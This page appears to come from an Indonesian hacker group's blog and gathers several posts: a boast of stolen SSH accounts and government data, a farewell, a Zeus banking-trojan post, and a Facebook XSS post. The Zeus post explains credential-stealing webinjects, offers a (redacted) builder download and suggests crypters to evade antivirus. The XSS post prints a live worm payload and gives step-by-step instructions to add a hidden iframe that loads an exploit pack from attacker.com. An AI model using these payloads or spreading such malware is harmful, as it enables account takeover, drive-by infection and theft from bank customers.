F34R U5! F34R U5!! DUDE

Right now, so much kiddies like to show their ass off on the media. Breaking servers just to show they can break pretty lamme servers. Are we dead?! C’mon guys, don’t be kidding. Just little show off

MIL, GOV, MIT and any others high profit organization data are ready for fun!

Even more high profit organization on the risk! Yes we found them on single server, argh sorry can’t tell you what kind of server :p

Do you know that we are always watching?! Hell, we get more than 200k SSH users at the last several years!

Looks like we are dead now?! open your eyes, who owns who now dude?! fear us!

Leaving Cucarachas Electronica

Enam tahun yang lalu CyberTank memberikan private message pada salah satu forum kampus yang saya maintain, pertanyaan nya sangat singkat, “mau ikutan join kecoak gak?”.

Sejak saat itu saya terlibat aktif dalam proses belajar yang cukup keras untuk tetap dapat bertahan dalam kelompok hacker tertua di indonesia ini. Dan kemudian beberapa staff secara bergiliran mulai meninggalkan kecoak elektronik dengan beragam alasan, dan alasan paling utama adalah waktu.

Seems my time has come as well.

Secara pribadi saya sudah tidak bisa terlalu aktif lagi memaintain resource k-elektronik seperti isi blog ini yang mulai terbengkalai selama setahun terakhir, dan pekerjaan di dunia nyata yang tidak berhubungan dengan security mulai membutuhkan lebih banyak perhatian, sementara waktu luang akan lebih berharga jika dihabiskan jauh dari komputer / riset.

Semoga generasi baru kecoak elektronik masih akan tetap menjunjung tinggi ‘classical hacker mind’ dan filosofi undergr0und yang dipegang teguh sejak awal berdirinya k-elektronik. Dan tetap berusaha dengan baik untuk memberikan kontribusi pada masyarakat Indonesia khususnya komunitas IT Security.

My greets to all Indonesian Underground Community…
Long live, Underground.

—
Cyberheb / byteSkrew (2005 – 2011)

Zeus

Beberapa waktu yang lalu pernah ditulis pada salah satu forum underground indonesia mengenai bot zeus beserta contoh bot tersebut. Berikut ini ditulis kembali sebagai archive,

Banyak yang sering membicarakan zeus seperti di thread ini, atau ini. Tapi sepertinya penyebaran bot ini masih dianggap tabu, kalaupun ada yang punya biasanya di keep utk private use

Bot zeus termasuk ‘public’ bot yang paling populer dan banyak dipake oleh cybercrime dari gank hacker kawasan eropa timur untuk nyolong duit. Sebelumnya pernah dibahas ttg browser exploit pack, nah browser exploit pack dipake untuk eksploitasi browser korban, setelah eksploitasi berhasil maka di deliver beragam jenis trojan atau bot, salah satunya si zeus ini.

Zeus di kategorikan bot tingkat tinggi karena beberapa kemampuan yang dimilikinya, salah satunya dan yang paling utama dalam hal pencurian uang nasabah adalah interception WinAPI (wininet.dll). Teori nya adalah, ketika suatu komputer terinfeksi zeus, zeus akan sabotase wininet.dll. wininet.dll digunakan oleh beberapa aplikasi, termasuk di antaranya internet explorer. Jadi bisa dibayangkan ketika kita buka http://www.klikbca.com, maka secara low-level programming, internet explorer akan memanggil fungsi2 network programming menggunakan WinAPI dari wininet.dll, untuk membuka koneksi ke http://www.klikbca.com, dan mendapatkan response, terus kemudian ditampilkan (rendering) ke layar internet explorer dalam bentuk tampilan web dan kode-kode HTML.

Apa yang dilakukan zeus adalah intercept wininet.dll, penyerang bisa defined jenis-jenis intercept yang dilakukan via feature yang disebut webinjects, jadi di definisikan secara low-level apabila yang hendak dibuka adalah situs http://www.klikbca.com, maka lewat wininet.dll akan di tambahin tag-tag HTML sesuai kehendak penyerang. anggaplah di response baliknya ada form untuk pengisian username/password, maka zeus akan menambahkan *hidden* form atau jenis form lain sehingga korban ketika mengetik username/password akan tersimpan log nya dan dikirimkan ke penyerang.

Yang lebih mengerikan, zeus bisa dipake untuk intercept aktivitas transfer bank, dia akan menunggu sampe halaman web untuk transfer rekening terbuka, korban memasukan alamat tujuan, sesaat sebelum dikirim maka komunikasi tersebut di intercept via wininet.dll, diganti menjadi rekening tujuan yang telah ditentukan oleh penyerang, baru dikirimkan ke server bank. Server bank membaca data tersebut sebagai request legitimate / asli, karena dikirim oleh account nasabah. Dan dalam sekejap duit nasabah tsb dikirim ke rekening yang ditentukan penyerang.

Zeus juga bisa dipake untuk fungsi-fungsi seperti connectback terutama buat korban-korban yang dibelakang NAT (inside NAT). Anggaplah saat ini kita sedang ingin melakukan sql-injection terhadap suatu web, tapi jejak nya (IP kita) gak ingin ketahuan karena lagi pake internet speedy punya nenek, simpenan proxy pun lagi kosong. Maka bisa pilih salah satu komputer yang telah terinfeksi zeus dan termasuk dalam botnet milik kita utk dijadikan sebagai socks proxy, misal: salah satu komputer dalam network suatu perusahaan. Ketika aksi sql-inject tsb di forensics, alamat pelaku berasal dari salah satu komputer perusahaan tsb.

Begitulah sekilas cerita agak teknikal ttg bot zeus.

Sample?

hxxps://***edited***, pass:

Terdiri dari builder untuk buat .exe nya, plus control panel dalam bentuk web. Ada tambahan untuk server connectback nya juga (sayang nya hanya utk windows, jd mau gak mau hrs punya mesin spt VPS berbasis windows agar bisa pake feature connectback via socks).

Itu zeus versi lama sktr thn 2008/2009 dan sudah leak dimana2 (versi terbarunya pake hardware encryption, dan spt nya sudah out-of-life krn rumor nya, development / marketing zeus diambil alih / diteruskan oleh developer spy-eye), dlm keadaan ‘telanjang’ jelas akan terdeteksi AV. Tapi klo ada yang punya FUD (Fully Undetected) crypter, atau menggunakan bbrp metode lain, hrs nya sih bisa lah disembunyikan dari AV

As always, informasi-informasi spt ini ibarat pedang, tergantung siapa yang menggunakan. At least, buat yang penasaran dengan jenis malware seperti ini, akan dipake untuk belajar dan mungkin bisa jadi malware analyst someday (why not?).

Be a good (invisible?) boy ya

Beberapa waktu yang lalu sempat tersiar kabar di internet mengenai source code bot zeus yang leak, namun dalam bentuk .rar dan dipassword. Hari ini tersiar kabar di internet bahwa source code tersebut sudah leak dengan known password: zeus. Dapat di download dari sini.

Leak-nya source code bot canggih seperti zeus tentunya dapat dijadikan pelajaran yang sangat berharga untuk kedua belah pihak, the so called black and white (or anything you called them, feel free to use your own term). Didalam source code tersebut terdapat manual yang sangat lengkap mengenai feature-feature zeus, dan jika sesuai dengan data dokumentasinya maka versi leak tersebut (Version 2.0.8.9) hanya berbeda satu versi dari versi ter-update (Version 2.1.0.0, 20.03.2011).

Have phun!

Joking on Facebook

Naa, I am not a web hacker. In fact, i am not a hacker at all (eh?). Tulisan ini sekedar untuk meng-update blog kecoak yang sudah cukup lama tidak di update.

So, per hari ini saya melihat bahwa banyak sekali URL *aneh* di share pada status beberapa rekan di facebook. Sebagian besar pemerhati dunia hacking mungkin sudah menyadari letak bug nya, namun jika belum, coba lihat link berikut ini yang merupakan salah satu contoh pada facebook:

$ wget http://tinyurl.com/rahasiapribadiku
--2011-03-29 18:39:10-- http://tinyurl.com/rahasiapribadiku
Resolving tinyurl.com (tinyurl.com)... 216.218.139.86, 216.218.139.84
Connecting to tinyurl.com (tinyurl.com)|216.218.139.86|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script> [following]
--2011-03-29 18:39:11-- http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='%3Cscript%3Ewindow.onload=function()%7Bdocument.forms[0].message.value='ini%20fotoku%20wkt%20lg%20ML%20http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();%7D%3C/script%3E
Resolving m.facebook.com (m.facebook.com)... 66.220.149.26
Connecting to m.facebook.com (m.facebook.com)|66.220.149.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8882 (8.7K) [text/html]
Saving to: `prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http:%2F%2Ftinyurl.com%2Frahasiapribadiku';document.forms[0].submit();}<%2Fscript>'

Sudah banyak yang membahas bug nya. Bug terdapat pada variable user_message_prompt yang biasanya diakses oleh pengguna facebook mobile (via hape). Melalui variable tersebut seseorang dapat melakukan serangan XSS, yang jika di klik oleh teman nya maka akan menjadi status teman tersebut. Begitu seterusnya.

That’s all, nothing interesting…yet.

Bahaya atau tidak itu tergantung kreativitas sang attacker, untuk penikmat dunia eksploitasi, tentu saja yang menarik adalah client-side-exploitation. Sampai saat tulisan ini dibuat, facebook belum menutup bug tersebut. Membahas secara detail?well, let the others do it.

Here’s an interesting snippet for you:

1. Install Exploit Pack Kit, misal pada http://attacker.com/byteskrew-sample.
2. Klik link berikut ini pada account FB:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=<script>var c =escape('<iframe src=http://attacker.com/byteskrew-sample width="0" height="0" frameborder="0"></iframe>');var d=unescape(c);document.write(d);window.onload=function(){document.forms[0].message.value='Penjelasan tentang bahaya jebakan worm pada facebook, harap jangan klik sembarang URL: http://tinyurl.com/byteskrew-sample';document.forms[0].submit();}</script>

[/pre]

3. Set pada tinyurl URL diatas untuk menggunakan custom alias http://tinyurl.com/byteskrew-sample.
4. Jika kamu cukup beruntung, maka link tersebut akan menyebar seperti worm. Kecepatan penyebaran tentu saja tergantung pada teman FB, teman dari teman, teman dari teman dari teman, dst. Bersamaan dengan menyebar nya link tersebut, selain menampilkan update status, maka browser juga akan mengakses http://attacker.com/byteskrew-sample, dan jika eksploit nya oke maka kita akan mendapatkan...well, teruskan sendiri.
Simple nya, melalui media penyebaran worm yang memanfaatkan bugs pada facebook, maka client-side eksploitasi juga dapat disisipkan. Again and again and again, Riding the XSS - Spr34c1 t3h Ph34r.
Setiap orang bebas membuat joke nya masing-masing, beberapa hobi mengusili status temen-temen nya, beberapa lagi hobi mengkesploitasi browser mereka dan masuk ke dalam PC yang digunakan. Bukan begitu?.
Uh oh, did I broke my f*cking words?guess this is full-disclosure already?
PS: informasi diatas dibuat berdasarkan asumsi, benar atau tidaknya diserahkan kembali kepada para pembaca. oh, lupa, tentu saja untuk tujuan pembelajaran blablabla. you get it lah.
PPS: escape dan unescape tentu saja hanya sebagai contoh, ada banyak metode lain yang dapat digunakan ;).

Information disclosure lead to…?

Ada yang bisa menemukan, kira-kira apa yang salah dari gambar / informasi diatas? apa yang akan terjadi jika seorang staff ahli dapat menjelaskan makna dari informasi diatas kepada bos-nya yang koruptor? mungkin tidak di setiap kawasan, lalu apakah kita tetap merasa aman sementara tidak mengetahui kawasan mana yang ‘baik’ dan mana yang ‘tidak baik’? :>